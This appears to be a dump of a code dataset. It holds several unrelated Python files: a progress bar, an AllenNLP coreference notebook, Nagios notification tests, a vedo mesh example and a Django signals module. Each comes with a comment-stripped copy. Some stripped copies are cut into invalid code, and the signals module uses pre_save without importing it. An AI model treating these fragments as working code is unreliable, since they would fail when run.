		remainder = percent / 100 * bar_size - dots
		if remainder > 0.8:
			tip = '='
		elif remainder > 0.4:
			tip = '-'
		else:
			tip = ''
		return '{0:>3}%[{1:<40}]'.format(int(percent), '=' * dots + tip)

	def update(self, percent):
		"""Redraw the bar at *percent* (a 0.0-1.0 fraction) in place."""
		self.displayed = True
		sys.stdout.write('\r' + self._render(percent))
		sys.stdout.flush()

	def done(self):
		"""Finish the progress line if the bar was ever drawn."""
		if self.displayed:
			# The original used a bare Python 2 ``print`` statement here;
			# under Python 3 that is a silent no-op expression, so no
			# newline would be written.  Write it explicitly instead,
			# which behaves the same on both versions.
			sys.stdout.write('\n')
			self.displayed = False
| 19.290323 | 47 | 0.607023 |
import sys
class SimpleProgressBar:
def __init__(self):
self.displayed = False
def update(self, percent):
self.displayed = True
bar_size = 40
percent *= 100.0
if percent > 100:
percent = 100.0
dots = int(bar_size * percent / 100)
plus = percent / 100 * bar_size - dots
if plus > 0.8:
plus = '='
elif plus > 0.4:
plus = '-'
else:
plus = ''
percent = int(percent)
bar = '=' * dots + plus
bar = '{0:>3}%[{1:<40}]'.format(percent, bar)
sys.stdout.write('\r'+bar)
sys.stdout.flush()
def done(self):
if self.displayed:
print
self.displayed = False
| true | true |
f72ec42eb3efc0949d13fb798398c8eed884a8bb | 2,368 | py | Python | triplet_to_text/code_/coreference_resolver/allennlp_coreference_resolution.py | kracr/OntoLearnBench | c1ca89acd6862fcd6954a62d83c43b2236cdc695 | [
"Apache-2.0"
] | 1 | 2022-02-11T19:36:40.000Z | 2022-02-11T19:36:40.000Z | triplet_to_text/code_/coreference_resolver/allennlp_coreference_resolution.py | kracr/OntoLearnBench | c1ca89acd6862fcd6954a62d83c43b2236cdc695 | [
"Apache-2.0"
] | null | null | null | triplet_to_text/code_/coreference_resolver/allennlp_coreference_resolution.py | kracr/OntoLearnBench | c1ca89acd6862fcd6954a62d83c43b2236cdc695 | [
"Apache-2.0"
] | 1 | 2021-06-08T18:54:40.000Z | 2021-06-08T18:54:40.000Z | #!/usr/bin/env python
# coding: utf-8
# In[1]:
from allennlp.predictors.predictor import Predictor
# ## Instantiate AllenNLP `Predictor`
# 1. Load the same model that is used in the [demo](https://demo.allennlp.org/coreference-resolution) (*don't get alarmed by the warning - we don't need to fine-tune the model to use it*).
# 2. Get the prediction :)
# In[2]:
# Pre-trained SpanBERT coreference model published by AllenNLP.
model_url = 'https://storage.googleapis.com/allennlp-public-models/coref-spanbert-large-2020.02.27.tar.gz'
predictor = Predictor.from_path(model_url)

# In[3]:

# Run coreference resolution on an example document.
text = "Eva and Martha didn't want their friend Jenny to feel lonely so they invited her to the party in Las Vegas."
prediction = predictor.predict(document=text)
# ## Coreference resolution with `Allen Institute`
# What we get as a result (`prediction`) is a dictionary as Allen outputs multiple different information at once.
# The ones that we found to be using the most are:
#
# | Key | Type | Description
# |:--------------------------|:-------------------|:----------------------------------------------------
# | `top_spans` | `List[List[int]]` | List of `spaCy` token indices pairs representing spans
# | `document` | `List[str]` | Document's tokens (from `spaCy`; but represented as string not Token)
# | `clusters` | `List[List[List[int]]]` | Clusters of spans (represented by token indices pairs)
# In[4]:

# it's our original text (with extra whitespaces as we trivially just joined tokens with ' ')
' '.join(prediction['document'])

# In[5]:

# and the found clusters - however, they are not easily understood...
# (each cluster is a list of [start, end] token-index spans)
prediction['clusters']

# In[6]:

# but that's how it looks after coreference resolution (notice the possessive!)
predictor.coref_resolved(text)
# As Allen's coreference resolution `Predictor` has quite a limited number of functionalities, in order to turn its output to a more readable one, we need to manually write some functions:
# In[7]:
def get_span_words(span, document):
    """Join the tokens covered by *span*, an inclusive [start, end] pair."""
    start, end = span
    return ' '.join(document[start:end + 1])


def print_clusters(prediction):
    """Print one line per coreference cluster: '<head>: [span; span; ...]'."""
    document = prediction['document']
    for cluster in prediction['clusters']:
        head = get_span_words(cluster[0], document)
        mentions = '; '.join(get_span_words(span, document) for span in cluster)
        print(f"{head}: [{mentions}]")
# In[8]:

# Show each cluster as "<first mention>: [mention; mention; ...]".
print_clusters(prediction)
| 29.234568 | 188 | 0.669341 |
from allennlp.predictors.predictor import Predictor
odels/coref-spanbert-large-2020.02.27.tar.gz'
predictor = Predictor.from_path(model_url)
text = "Eva and Martha didn't want their friend Jenny to feel lonely so they invited her to the party in Las Vegas."
prediction = predictor.predict(document=text)
# ## Coreference resolution with `Allen Institute`
# What we get as a result (`prediction`) is a dictionary as Allen outputs multiple different information at once.
# The ones that we found to be using the most are:
#
# | Key | Type | Description
# |:--------------------------|:-------------------|:----------------------------------------------------
# | `top_spans` | `List[List[int]]` | List of `spaCy` token indices pairs representing spans
# | `document` | `List[str]` | Document's tokens (from `spaCy`; but represented as string not Token)
' '.join(prediction['document'])
# In[5]:
# and the found clusters - however, they are not easily understood...
prediction['clusters']
# In[6]:
# but that's how it looks after coreference resolution (notice the possessive!)
predictor.coref_resolved(text)
# In[7]:
def get_span_words(span, document):
return ' '.join(document[span[0]:span[1]+1])
def print_clusters(prediction):
document, clusters = prediction['document'], prediction['clusters']
for cluster in clusters:
print(get_span_words(cluster[0], document) + ': ', end='')
print(f"[{'; '.join([get_span_words(span, document) for span in cluster])}]")
# In[8]:
print_clusters(prediction)
| true | true |
f72ec4c3bf5925d67bf0defaf42a32236624789c | 1,002 | py | Python | venv/Scripts/futurize-script.py | saurabhjha137/OCR_using_tesseract | d852865086a7a104f74866411058e51f407b5f6c | [
"Apache-1.1"
] | null | null | null | venv/Scripts/futurize-script.py | saurabhjha137/OCR_using_tesseract | d852865086a7a104f74866411058e51f407b5f6c | [
"Apache-1.1"
] | null | null | null | venv/Scripts/futurize-script.py | saurabhjha137/OCR_using_tesseract | d852865086a7a104f74866411058e51f407b5f6c | [
"Apache-1.1"
] | null | null | null | #!"f:\opencv projects\tesseract ocr\venv\scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'future==0.18.2','console_scripts','futurize'
import re
import sys
# for compatibility with easy_install; see #2198
__requires__ = 'future==0.18.2'
try:
from importlib.metadata import distribution
except ImportError:
try:
from importlib_metadata import distribution
except ImportError:
from pkg_resources import load_entry_point
def importlib_load_entry_point(spec, group, name):
dist_name, _, _ = spec.partition('==')
matches = (
entry_point
for entry_point in distribution(dist_name).entry_points
if entry_point.group == group and entry_point.name == name
)
return next(matches).load()
globals().setdefault('load_entry_point', importlib_load_entry_point)
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(load_entry_point('future==0.18.2', 'console_scripts', 'futurize')())
| 29.470588 | 81 | 0.702595 |
import re
import sys
quires__ = 'future==0.18.2'
try:
from importlib.metadata import distribution
except ImportError:
try:
from importlib_metadata import distribution
except ImportError:
from pkg_resources import load_entry_point
def importlib_load_entry_point(spec, group, name):
dist_name, _, _ = spec.partition('==')
matches = (
entry_point
for entry_point in distribution(dist_name).entry_points
if entry_point.group == group and entry_point.name == name
)
return next(matches).load()
globals().setdefault('load_entry_point', importlib_load_entry_point)
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(load_entry_point('future==0.18.2', 'console_scripts', 'futurize')())
| true | true |
f72ec7cea5ff8e51a73eb0ada22fc04b55636c4f | 9,232 | py | Python | python/nagcat/unittests/test_notify.py | marineam/nagcat | 445d0efe1fb2ec93c31d1f9d8fa0c0563189ffaf | [
"Apache-2.0"
] | null | null | null | python/nagcat/unittests/test_notify.py | marineam/nagcat | 445d0efe1fb2ec93c31d1f9d8fa0c0563189ffaf | [
"Apache-2.0"
] | null | null | null | python/nagcat/unittests/test_notify.py | marineam/nagcat | 445d0efe1fb2ec93c31d1f9d8fa0c0563189ffaf | [
"Apache-2.0"
] | null | null | null | # Copyright 2010 ITA Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from twisted.trial import unittest
from nagcat import notify
import coil
ENVIRONMENT_HOST = {
# Host Macros
'NAGIOS_HOSTNAME': "localhost",
'NAGIOS_HOSTDISPLAYNAME': "localhost",
'NAGIOS_HOSTALIAS': "localhost",
'NAGIOS_HOSTADDRESS': "127.0.0.1",
'NAGIOS_HOSTSTATE': "UP",
'NAGIOS_HOSTSTATEID': "0",
'NAGIOS_LASTHOSTSTATE': "UP",
'NAGIOS_LASTHOSTSTATEID': "0",
'NAGIOS_HOSTSTATETYPE': "HARD",
'NAGIOS_HOSTATTEMPT': "1",
'NAGIOS_MAXHOSTATTEMPTS': "3",
'NAGIOS_HOSTEVENTID': "0",
'NAGIOS_LASTHOSTEVENTID': "0",
'NAGIOS_HOSTPROBLEMID': "0",
'NAGIOS_LASTHOSTPROBLEMID': "0",
'NAGIOS_HOSTLATENCY': "0.123",
'NAGIOS_HOSTEXECUTIONTIME': "4.012",
'NAGIOS_HOSTDURATION': "35d 15h 31m 49s",
'NAGIOS_HOSTDURATIONSEC': "3079909",
'NAGIOS_HOSTDOWNTIME': "0",
'NAGIOS_HOSTPERCENTCHANGE': "0.0",
'NAGIOS_HOSTGROUPNAMES': "a_group,b_group",
'NAGIOS_LASTHOSTCHECK': "1260009929",
'NAGIOS_LASTHOSTSTATECHANGE': "1256929950",
'NAGIOS_LASTHOSTUP': "1260009939",
'NAGIOS_LASTHOSTDOWN': "0",
'NAGIOS_LASTHOSTUNREACHABLE': "0",
'NAGIOS_HOSTOUTPUT': "PING OK - Packet loss = 0%, RTA = 2.00 ms",
'NAGIOS_LONGHOSTOUTPUT': "",
'NAGIOS_HOSTPERFDATA': "rta=10.778000ms;3000.000000;5000.000000;0.000000 pl=0%;80;100;0",
'NAGIOS_HOSTCHECKCOMMAND': "check_host_alive",
'NAGIOS_HOSTACTIONURL': "",
'NAGIOS_HOSTNOTESURL': "",
'NAGIOS_HOSTNOTES': "",
'NAGIOS_TOTALHOSTSERVICES': "39",
'NAGIOS_TOTALHOSTSERVICESOK': "38",
'NAGIOS_TOTALHOSTSERVICESWARNING': "0",
'NAGIOS_TOTALHOSTSERVICESCRITICAL': "1",
'NAGIOS_TOTALHOSTSERVICESUNKNOWN': "0",
# Host Group Macros
'NAGIOS_HOSTGROUPNAME': "a_group",
'NAGIOS_HOSTGROUPALIAS': "A Group",
'NAGIOS_HOSTGROUPMEMBERS': "localhost",
'NAGIOS_HOSTGROUPNOTES': "",
'NAGIOS_HOSTGROUPNOTESURL': "",
'NAGIOS_HOSTGROUPACTIONURL': "",
# Contact Macros
'NAGIOS_CONTACTNAME': "root",
'NAGIOS_CONTACTALIAS': "Mr. Big",
'NAGIOS_CONTACTEMAIL': "root@localhost",
'NAGIOS_CONTACTPAGER': "pager@localhost",
'NAGIOS_CONTACTGROUPNAMES': "admins,managers",
# The address fields could be anything...
#'NAGIOS_CONTACTADDRESS0': "",
# Contact Group Macros
'NAGIOS_CONTACTGROUPNAME': "admins",
'NAGIOS_CONTACTGROUPALIAS': "Admins",
'NAGIOS_CONTACTGROUPMEMBERS': "root,luser",
# Summary Macros (NAGIOS_TOTAL*) are not always available
# so they are not included here...
# Notification Macros
'NAGIOS_NOTIFICATIONTYPE': "PROBLEM",
'NAGIOS_NOTIFICATIONRECIPIENTS': "root",
'NAGIOS_NOTIFICATIONISESCALATED': "0",
'NAGIOS_NOTIFICATIONAUTHOR': "",
'NAGIOS_NOTIFICATIONAUTHORNAME': "",
'NAGIOS_NOTIFICATIONAUTHORALIAS': "",
'NAGIOS_NOTIFICATIONCOMMENT': "",
'NAGIOS_NOTIFICATIONNUMBER': "1",
'NAGIOS_HOSTNOTIFICATIONNUMBER': "0",
'NAGIOS_HOSTNOTIFICATIONID': "0",
'NAGIOS_SERVICENOTIFICATIONNUMBER': "1",
'NAGIOS_SERVICENOTIFICATIONID': "409161",
# Date/Time Macros
'NAGIOS_LONGDATETIME': "Sun Dec 6 04:25:32 EST 2009",
'NAGIOS_SHORTDATETIME': "12-06-2009 04:25:33",
'NAGIOS_DATE': "12-06-2009",
'NAGIOS_TIME': "04:25:34",
'NAGIOS_TIMET': "1260091534",
# File Macros:
'NAGIOS_MAINCONFIGFILE': "/path/to/nagios.cfg",
'NAGIOS_STATUSDATAFILE': "/path/to/status.dat",
'NAGIOS_RETENTIONDATAFILE': "/path/to/retention.dat",
'NAGIOS_OBJECTCACHEFILE': "/path/to/objects.cache",
'NAGIOS_TEMPFILE': "/path/to/nagios.tmp",
'NAGIOS_TEMPPATH': "/tmp",
'NAGIOS_LOGFILE': "/path/to/nagios.log",
'NAGIOS_RESOURCEFILE': "/path/to/resource.cfg",
'NAGIOS_COMMANDFILE': "/path/to/nagios.cmd",
# Misc Macros:
'NAGIOS_PROCESSSTARTTIME': "1259966149",
'NAGIOS_EVENTSTARTTIME': "1259966149",
'NAGIOS_ADMINEMAIL': "root@localhost",
'NAGIOS_ADMINPAGER': "pager@localhost",
# These are available but could be anything...
#'NAGIOS_ARG0': "",
#'NAGIOS_USER0': "",
}
ENVIRONMENT_SERVICE = {
# Service Macros
'NAGIOS_SERVICEDESC': "PING",
'NAGIOS_SERVICEDISPLAYNAME': "PING",
'NAGIOS_SERVICESTATE': "CRITICAL",
'NAGIOS_SERVICESTATEID': "2",
'NAGIOS_LASTSERVICESTATE': "CRITICAL",
'NAGIOS_LASTSERVICESTATEID': "2",
'NAGIOS_SERVICESTATETYPE': "HARD",
'NAGIOS_SERVICEATTEMPT': "3",
'NAGIOS_MAXSERVICEATTEMPTS': "3",
'NAGIOS_SERVICEISVOLATILE': "0",
'NAGIOS_SERVICEEVENTID': "56460",
'NAGIOS_LASTSERVICEEVENTID': "56405",
'NAGIOS_SERVICEPROBLEMID': "28201",
'NAGIOS_LASTSERVICEPROBLEMID': "0",
'NAGIOS_SERVICELATENCY': "0.357",
'NAGIOS_SERVICEEXECUTIONTIME': "0.000",
'NAGIOS_SERVICEDURATION': "0d 0h 0m 17s",
'NAGIOS_SERVICEDURATIONSEC': "17",
'NAGIOS_SERVICEDOWNTIME': "0",
'NAGIOS_SERVICEPERCENTCHANGE': "12.37",
'NAGIOS_SERVICEGROUPNAMES': "z_gorup,y_group",
'NAGIOS_LASTSERVICECHECK': "1260146052",
'NAGIOS_LASTSERVICESTATECHANGE': "1260146112",
'NAGIOS_LASTSERVICEOK': "1260146052",
'NAGIOS_LASTSERVICEWARNING': "1260091455",
'NAGIOS_LASTSERVIVECRITICAL': "1260146112",
'NAGIOS_LASTSERVICEUNKNOWN': "1257999616",
'NAGIOS_SERVICEOUTPUT': "PING CRITICAL - Packet loss = 60%, RTA = 0.38 ms",
'NAGIOS_LONGSERVICEOUTPUT': "Long Output\\nWith\\nextra lines",
'NAGIOS_SERVICEPERFDATA': "",
'NAGIOS_SERVICECHECKCOMMAND': "check_freshness",
'NAGIOS_SERVICEACTIONURL': "",
'NAGIOS_SERVICENOTESURL': "",
'NAGIOS_SERVICENOTES': "",
# Service Group Macros
'NAGIOS_SERVICEGROUPNAME': "z_group",
'NAGIOS_SERVICEGROUPALIAS': "Z Group",
'NAGIOS_SERVICEGROUPMEMBERS': "localhost,PING,otherhost,PING",
'NAGIOS_SERVICEGROUPNOTESURL': "",
'NAGIOS_SERVICEGROUPNOTES': "",
}
ENVIRONMENT_SERVICE.update(ENVIRONMENT_HOST)
class MacrosTestCase(unittest.TestCase):
def setUp(self):
self.macros = notify.Macros(ENVIRONMENT_SERVICE)
def testPrefix(self):
for key in self.macros:
self.failIf(key.startswith("NAGIOS_"))
def testNewlines(self):
for key, value in self.macros.iteritems():
if key == "LONGSERVICEOUTPUT":
self.assert_(len(value.splitlines()) > 1)
else:
self.assert_(not value or len(value.splitlines()) == 1)
def testMissing(self):
self.assertRaises(notify.MissingMacro,
lambda: self.macros['DOESNOTEXIST'])
class NotificationTest(unittest.TestCase):
def setUp(self):
self.macros = {
'host': notify.Macros(ENVIRONMENT_HOST),
'service': notify.Macros(ENVIRONMENT_SERVICE)}
self.config = coil.parse(notify.DEFAULT_CONFIG)
def testSubject(self):
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], self.config)
self.assert_(obj.subject())
def testBody(self):
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], self.config)
long = obj.body()
self.assert_(long)
self.failIf(re.search('{\w+}', long))
obj.format = "short"
short = obj.body()
self.assert_(short)
self.failIf(re.search('{\w+}', short))
self.assert_(len(short) < len(long))
def testURLs(self):
config = self.config.copy()
config['urls.nagios'] ="https://testURLs/zomg/nagios"
config['urls.graphs'] ="https://testURLs/zomg/graphs"
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], config)
urls = obj.urls()
self.assert_(urls['nagios'].startswith(config['urls.nagios']))
self.assert_(urls['graphs'].startswith(config['urls.graphs']))
| 40.31441 | 102 | 0.603986 |
import re
from twisted.trial import unittest
from nagcat import notify
import coil
ENVIRONMENT_HOST = {
'NAGIOS_HOSTNAME': "localhost",
'NAGIOS_HOSTDISPLAYNAME': "localhost",
'NAGIOS_HOSTALIAS': "localhost",
'NAGIOS_HOSTADDRESS': "127.0.0.1",
'NAGIOS_HOSTSTATE': "UP",
'NAGIOS_HOSTSTATEID': "0",
'NAGIOS_LASTHOSTSTATE': "UP",
'NAGIOS_LASTHOSTSTATEID': "0",
'NAGIOS_HOSTSTATETYPE': "HARD",
'NAGIOS_HOSTATTEMPT': "1",
'NAGIOS_MAXHOSTATTEMPTS': "3",
'NAGIOS_HOSTEVENTID': "0",
'NAGIOS_LASTHOSTEVENTID': "0",
'NAGIOS_HOSTPROBLEMID': "0",
'NAGIOS_LASTHOSTPROBLEMID': "0",
'NAGIOS_HOSTLATENCY': "0.123",
'NAGIOS_HOSTEXECUTIONTIME': "4.012",
'NAGIOS_HOSTDURATION': "35d 15h 31m 49s",
'NAGIOS_HOSTDURATIONSEC': "3079909",
'NAGIOS_HOSTDOWNTIME': "0",
'NAGIOS_HOSTPERCENTCHANGE': "0.0",
'NAGIOS_HOSTGROUPNAMES': "a_group,b_group",
'NAGIOS_LASTHOSTCHECK': "1260009929",
'NAGIOS_LASTHOSTSTATECHANGE': "1256929950",
'NAGIOS_LASTHOSTUP': "1260009939",
'NAGIOS_LASTHOSTDOWN': "0",
'NAGIOS_LASTHOSTUNREACHABLE': "0",
'NAGIOS_HOSTOUTPUT': "PING OK - Packet loss = 0%, RTA = 2.00 ms",
'NAGIOS_LONGHOSTOUTPUT': "",
'NAGIOS_HOSTPERFDATA': "rta=10.778000ms;3000.000000;5000.000000;0.000000 pl=0%;80;100;0",
'NAGIOS_HOSTCHECKCOMMAND': "check_host_alive",
'NAGIOS_HOSTACTIONURL': "",
'NAGIOS_HOSTNOTESURL': "",
'NAGIOS_HOSTNOTES': "",
'NAGIOS_TOTALHOSTSERVICES': "39",
'NAGIOS_TOTALHOSTSERVICESOK': "38",
'NAGIOS_TOTALHOSTSERVICESWARNING': "0",
'NAGIOS_TOTALHOSTSERVICESCRITICAL': "1",
'NAGIOS_TOTALHOSTSERVICESUNKNOWN': "0",
'NAGIOS_HOSTGROUPNAME': "a_group",
'NAGIOS_HOSTGROUPALIAS': "A Group",
'NAGIOS_HOSTGROUPMEMBERS': "localhost",
'NAGIOS_HOSTGROUPNOTES': "",
'NAGIOS_HOSTGROUPNOTESURL': "",
'NAGIOS_HOSTGROUPACTIONURL': "",
'NAGIOS_CONTACTNAME': "root",
'NAGIOS_CONTACTALIAS': "Mr. Big",
'NAGIOS_CONTACTEMAIL': "root@localhost",
'NAGIOS_CONTACTPAGER': "pager@localhost",
'NAGIOS_CONTACTGROUPNAMES': "admins,managers",
'NAGIOS_CONTACTGROUPNAME': "admins",
'NAGIOS_CONTACTGROUPALIAS': "Admins",
'NAGIOS_CONTACTGROUPMEMBERS': "root,luser",
'NAGIOS_NOTIFICATIONTYPE': "PROBLEM",
'NAGIOS_NOTIFICATIONRECIPIENTS': "root",
'NAGIOS_NOTIFICATIONISESCALATED': "0",
'NAGIOS_NOTIFICATIONAUTHOR': "",
'NAGIOS_NOTIFICATIONAUTHORNAME': "",
'NAGIOS_NOTIFICATIONAUTHORALIAS': "",
'NAGIOS_NOTIFICATIONCOMMENT': "",
'NAGIOS_NOTIFICATIONNUMBER': "1",
'NAGIOS_HOSTNOTIFICATIONNUMBER': "0",
'NAGIOS_HOSTNOTIFICATIONID': "0",
'NAGIOS_SERVICENOTIFICATIONNUMBER': "1",
'NAGIOS_SERVICENOTIFICATIONID': "409161",
'NAGIOS_LONGDATETIME': "Sun Dec 6 04:25:32 EST 2009",
'NAGIOS_SHORTDATETIME': "12-06-2009 04:25:33",
'NAGIOS_DATE': "12-06-2009",
'NAGIOS_TIME': "04:25:34",
'NAGIOS_TIMET': "1260091534",
'NAGIOS_MAINCONFIGFILE': "/path/to/nagios.cfg",
'NAGIOS_STATUSDATAFILE': "/path/to/status.dat",
'NAGIOS_RETENTIONDATAFILE': "/path/to/retention.dat",
'NAGIOS_OBJECTCACHEFILE': "/path/to/objects.cache",
'NAGIOS_TEMPFILE': "/path/to/nagios.tmp",
'NAGIOS_TEMPPATH': "/tmp",
'NAGIOS_LOGFILE': "/path/to/nagios.log",
'NAGIOS_RESOURCEFILE': "/path/to/resource.cfg",
'NAGIOS_COMMANDFILE': "/path/to/nagios.cmd",
'NAGIOS_PROCESSSTARTTIME': "1259966149",
'NAGIOS_EVENTSTARTTIME': "1259966149",
'NAGIOS_ADMINEMAIL': "root@localhost",
'NAGIOS_ADMINPAGER': "pager@localhost",
}
ENVIRONMENT_SERVICE = {
'NAGIOS_SERVICEDESC': "PING",
'NAGIOS_SERVICEDISPLAYNAME': "PING",
'NAGIOS_SERVICESTATE': "CRITICAL",
'NAGIOS_SERVICESTATEID': "2",
'NAGIOS_LASTSERVICESTATE': "CRITICAL",
'NAGIOS_LASTSERVICESTATEID': "2",
'NAGIOS_SERVICESTATETYPE': "HARD",
'NAGIOS_SERVICEATTEMPT': "3",
'NAGIOS_MAXSERVICEATTEMPTS': "3",
'NAGIOS_SERVICEISVOLATILE': "0",
'NAGIOS_SERVICEEVENTID': "56460",
'NAGIOS_LASTSERVICEEVENTID': "56405",
'NAGIOS_SERVICEPROBLEMID': "28201",
'NAGIOS_LASTSERVICEPROBLEMID': "0",
'NAGIOS_SERVICELATENCY': "0.357",
'NAGIOS_SERVICEEXECUTIONTIME': "0.000",
'NAGIOS_SERVICEDURATION': "0d 0h 0m 17s",
'NAGIOS_SERVICEDURATIONSEC': "17",
'NAGIOS_SERVICEDOWNTIME': "0",
'NAGIOS_SERVICEPERCENTCHANGE': "12.37",
'NAGIOS_SERVICEGROUPNAMES': "z_gorup,y_group",
'NAGIOS_LASTSERVICECHECK': "1260146052",
'NAGIOS_LASTSERVICESTATECHANGE': "1260146112",
'NAGIOS_LASTSERVICEOK': "1260146052",
'NAGIOS_LASTSERVICEWARNING': "1260091455",
'NAGIOS_LASTSERVIVECRITICAL': "1260146112",
'NAGIOS_LASTSERVICEUNKNOWN': "1257999616",
'NAGIOS_SERVICEOUTPUT': "PING CRITICAL - Packet loss = 60%, RTA = 0.38 ms",
'NAGIOS_LONGSERVICEOUTPUT': "Long Output\\nWith\\nextra lines",
'NAGIOS_SERVICEPERFDATA': "",
'NAGIOS_SERVICECHECKCOMMAND': "check_freshness",
'NAGIOS_SERVICEACTIONURL': "",
'NAGIOS_SERVICENOTESURL': "",
'NAGIOS_SERVICENOTES': "",
'NAGIOS_SERVICEGROUPNAME': "z_group",
'NAGIOS_SERVICEGROUPALIAS': "Z Group",
'NAGIOS_SERVICEGROUPMEMBERS': "localhost,PING,otherhost,PING",
'NAGIOS_SERVICEGROUPNOTESURL': "",
'NAGIOS_SERVICEGROUPNOTES': "",
}
ENVIRONMENT_SERVICE.update(ENVIRONMENT_HOST)
class MacrosTestCase(unittest.TestCase):
def setUp(self):
self.macros = notify.Macros(ENVIRONMENT_SERVICE)
def testPrefix(self):
for key in self.macros:
self.failIf(key.startswith("NAGIOS_"))
def testNewlines(self):
for key, value in self.macros.iteritems():
if key == "LONGSERVICEOUTPUT":
self.assert_(len(value.splitlines()) > 1)
else:
self.assert_(not value or len(value.splitlines()) == 1)
def testMissing(self):
self.assertRaises(notify.MissingMacro,
lambda: self.macros['DOESNOTEXIST'])
class NotificationTest(unittest.TestCase):
def setUp(self):
self.macros = {
'host': notify.Macros(ENVIRONMENT_HOST),
'service': notify.Macros(ENVIRONMENT_SERVICE)}
self.config = coil.parse(notify.DEFAULT_CONFIG)
def testSubject(self):
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], self.config)
self.assert_(obj.subject())
def testBody(self):
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], self.config)
long = obj.body()
self.assert_(long)
self.failIf(re.search('{\w+}', long))
obj.format = "short"
short = obj.body()
self.assert_(short)
self.failIf(re.search('{\w+}', short))
self.assert_(len(short) < len(long))
def testURLs(self):
config = self.config.copy()
config['urls.nagios'] ="https://testURLs/zomg/nagios"
config['urls.graphs'] ="https://testURLs/zomg/graphs"
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], config)
urls = obj.urls()
self.assert_(urls['nagios'].startswith(config['urls.nagios']))
self.assert_(urls['graphs'].startswith(config['urls.graphs']))
| true | true |
f72ec7f9188135bc2abd9576d4b4c2d59ae7a487 | 569 | py | Python | examples/basic/buildmesh.py | hadivafaii/vedo | 15f9adbd36d25c0212cbd4eb0c15af54c19f3819 | [
"CC0-1.0"
] | 836 | 2020-06-14T02:38:12.000Z | 2022-03-31T15:39:50.000Z | examples/basic/buildmesh.py | hadivafaii/vedo | 15f9adbd36d25c0212cbd4eb0c15af54c19f3819 | [
"CC0-1.0"
] | 418 | 2020-06-14T10:51:32.000Z | 2022-03-31T23:23:14.000Z | examples/basic/buildmesh.py | hadivafaii/vedo | 15f9adbd36d25c0212cbd4eb0c15af54c19f3819 | [
"CC0-1.0"
] | 136 | 2020-06-14T02:26:41.000Z | 2022-03-31T12:47:18.000Z | """Manually build a mesh from points and faces"""
from vedo import Mesh, printc, show
verts = [(50,50,50), (70,40,50), (50,40,80), (80,70,50)]
faces = [(0,1,2), (2,1,3), (1,0,3)]
# (the first triangle face is formed by vertex 0, 1 and 2)
# Build the polygonal Mesh object:
mesh = Mesh([verts, faces])
mesh.backColor('violet').lineColor('tomato').lineWidth(2)
labs = mesh.labels('id').c('black')
# retrieve them as numpy arrays
printc('points():\n', mesh.points(), c=3)
printc('faces(): \n', mesh.faces(), c=3)
show(mesh, labs, __doc__, viewup='z', axes=1).close()
| 31.611111 | 58 | 0.648506 | from vedo import Mesh, printc, show
verts = [(50,50,50), (70,40,50), (50,40,80), (80,70,50)]
faces = [(0,1,2), (2,1,3), (1,0,3)]
mesh = Mesh([verts, faces])
mesh.backColor('violet').lineColor('tomato').lineWidth(2)
labs = mesh.labels('id').c('black')
printc('points():\n', mesh.points(), c=3)
printc('faces(): \n', mesh.faces(), c=3)
show(mesh, labs, __doc__, viewup='z', axes=1).close()
| true | true |
f72ec8d5be139f6310464dc01e7c0f57e04b86ad | 38 | py | Python | tests/components/statsd/__init__.py | domwillcode/home-assistant | f170c80bea70c939c098b5c88320a1c789858958 | [
"Apache-2.0"
] | 30,023 | 2016-04-13T10:17:53.000Z | 2020-03-02T12:56:31.000Z | tests/components/statsd/__init__.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 31,101 | 2020-03-02T13:00:16.000Z | 2022-03-31T23:57:36.000Z | tests/components/statsd/__init__.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 11,956 | 2016-04-13T18:42:31.000Z | 2020-03-02T09:32:12.000Z | """Tests for the statsd component."""
| 19 | 37 | 0.684211 | true | true | |
f72eca4472be03ec523013a1e2a1d617e258713b | 590 | py | Python | users/signals.py | kipkoech-msojo/project_website | 137c8e100171dfda2f722a8e6d1079db87860a14 | [
"MIT"
] | null | null | null | users/signals.py | kipkoech-msojo/project_website | 137c8e100171dfda2f722a8e6d1079db87860a14 | [
"MIT"
] | null | null | null | users/signals.py | kipkoech-msojo/project_website | 137c8e100171dfda2f722a8e6d1079db87860a14 | [
"MIT"
] | null | null | null | from django.dispatch import receiver
from django.db.models.signals import post_save
from .models import Profile
from django.contrib.auth.models import User
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
@receiver(pre_save,sender=User)
def create_hash_for_user(sender,instance,**kwargs):
if not instance.pk:
print(instance,'[[[[[[[[[[[[[[[[[[[[[') | 31.052632 | 61 | 0.732203 | from django.dispatch import receiver
from django.db.models.signals import post_save
from .models import Profile
from django.contrib.auth.models import User
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
@receiver(pre_save,sender=User)
def create_hash_for_user(sender,instance,**kwargs):
if not instance.pk:
print(instance,'[[[[[[[[[[[[[[[[[[[[[') | false | true |
f72eca7ec01c7f98779fd742ed2f63dd47c2895f | 1,623 | py | Python | client/fmcmds/env_shell.py | AlexRogalskiy/caastle | bb832c6828c6e97ac18d58ac0f23d8f61ff7bec3 | [
"Apache-2.0"
